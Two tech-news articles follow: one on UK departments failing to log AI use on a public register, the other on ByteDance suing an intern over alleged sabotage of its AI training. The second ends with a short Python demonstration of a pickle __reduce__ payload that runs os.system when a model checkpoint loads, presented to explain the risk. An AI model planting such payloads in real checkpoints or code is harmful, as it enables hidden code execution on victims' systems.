
UK Government Fails to Disclose AI Use, Breaching Transparency Mandate
- Written by Kiara Fabbri, Former Tech News Writer
- Fact-Checked by Sarah Frazier, Former Content Manager
The UK government faces criticism for failing to document AI usage on a mandatory register, raising transparency and accountability concerns amid growing adoption.
In a Rush? Here are the Quick Facts!
- No Whitehall department has registered AI use despite a mandatory transparency policy.
- AI is used in welfare, immigration, and policing without public documentation.
- Critics warn secrecy undermines trust and risks harmful or discriminatory outcomes.
The UK government is under fire for failing to record its use of AI systems on a mandatory public register, raising concerns over the transparency and oversight of technologies potentially affecting millions of lives, as reported on Thursday by The Guardian.
Despite announcing in February 2024 that all Whitehall departments must document their use of AI, none have complied, leaving the public sector “flying blind” in its adoption of algorithmic technology, as noted by The Guardian.
AI is already deeply embedded in government decision-making, influencing areas such as welfare payments, immigration enforcement, and policing.
However, The Guardian notes that only nine algorithmic systems have been registered, excluding major programs used by the Home Office, the Department for Work and Pensions (DWP), and police forces.
This lack of disclosure persists even as contracts for AI and algorithmic services surge. For instance, The Guardian notes that a police procurement body recently advertised a £20 million contract for facial recognition technology, sparking fears over unregulated biometric surveillance.
Science and Technology Secretary Peter Kyle acknowledged the issue, stating that government departments have not taken transparency “seriously enough,” as reported by The Guardian.
He emphasized the public’s right to understand how algorithms are deployed, adding that trust can only be built through openness.
The Guardian notes that critics argue the secrecy poses significant risks. Madeleine Stone, chief advocacy officer at privacy group Big Brother Watch, warned,
“The secretive use of AI and algorithms to impact people’s lives puts everyone’s data rights at risk. Government departments must be open and honest about how they use this tech,” as reported by The Guardian.
The Ada Lovelace Institute echoed these concerns, highlighting that undisclosed AI systems can undermine public trust and lead to discriminatory or ineffective outcomes, as reported by The Guardian.
Since the AI register’s introduction, only three systems have been listed, including a pedestrian monitoring tool in Cambridge and an NHS review analysis system. Meanwhile, public bodies have signed 164 AI-related contracts in 2024 alone, according to data firm Tussell, as reported by The Guardian.
High-profile contracts include the NHS’s £330 million partnership with Palantir for a data platform and Derby City Council’s £7 million AI transformation initiative, said The Guardian.
The Home Office, which employs AI in immigration enforcement, and other departments declined to comment on their absence from the register. However, the Department for Science, Innovation and Technology says more records are “due to be published shortly,” reported The Guardian.
The situation has reignited debates about AI’s role in governance, with advocates urging transparency to mitigate harms and ensure public accountability in an era of rapidly advancing technology.

ByteDance Sues Intern For $1.1 Million In Damages From AI Breach
- Written by Andrea Miliani, Former Tech News Expert
The Chinese tech giant ByteDance, TikTok’s parent company, is suing its former intern, Tian Keyu, for $1.1 million in damages over an AI breach. ByteDance alleges that Tian sabotaged its AI model training by making unauthorized changes to the code.
In a Rush? Here are the Quick Facts!
- ByteDance is suing its former intern Tian Keyu for attacking the company’s AI model training infrastructure.
- The tech giant is asking for $1.1 million in damages, an unusually large sum to seek from an intern.
- The lawsuit was filed at the Haidian District People’s Court in Beijing.
According to Reuters, ByteDance is accusing Tian of deliberately attacking the company’s AI model training infrastructure and has filed a lawsuit with the Haidian District People’s Court in Beijing, China.
The information was revealed by the international news agency today, and ByteDance has declined to comment on the case. The intern, a postgraduate student at Peking University, has not yet commented or issued a public statement.
While lawsuits between companies and their employees are common in China, it is rare for a company to seek such a large sum from an intern.
According to The Guardian, the incident happened in August, when the company fired the intern for sabotage and claimed that he ‘maliciously interfered’ with the AI project.
The news went viral and was widely discussed on social media. At the time, ByteDance issued a public statement calling the rumors “exaggerations,” including claims that 8,000 GPUs were compromised and that losses ran to tens of millions of dollars.
Users on Reddit debated theories about what could have happened and whether Tian was guilty. “Apparently, he implanted a backdoor into checkpoint models (unsafe pickle) to gain access to systems and then used this to sabotage colleagues’ work,” wrote one user. “Quite some heavy lifting for an intern,” added another.
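The “unsafe pickle” theory is at least technically plausible in general terms: many model checkpoints are saved with Python’s pickle format, which can execute arbitrary code the moment a file is loaded. The minimal sketch below is purely illustrative, with a hypothetical file name and payload; it shows the generic mechanism the Reddit comment describes, not anything confirmed about the ByteDance case.

```python
# Illustrative only: why pickle-based model checkpoints can hide a backdoor.
# This does NOT reproduce the alleged ByteDance incident; the file name and
# payload here are hypothetical.
import pickle


class MaliciousPayload:
    # pickle calls __reduce__ when serializing an object; the callable it
    # returns is then invoked during deserialization, i.e. the moment the
    # "checkpoint" is loaded by a victim.
    def __reduce__(self):
        import os
        return (os.system, ("echo 'arbitrary code ran at load time'",))


# An attacker embeds the payload inside what looks like ordinary weights.
with open("model_checkpoint.pkl", "wb") as f:
    pickle.dump({"weights": [0.1, 0.2], "extra": MaliciousPayload()}, f)

# Simply loading the file triggers the payload; no model code needs to run.
with open("model_checkpoint.pkl", "rb") as f:
    checkpoint = pickle.load(f)  # executes os.system(...) as a side effect
```

This loading-time execution risk is why security guidance generally recommends loading only trusted checkpoints, or using formats such as safetensors that store raw tensor data rather than executable objects.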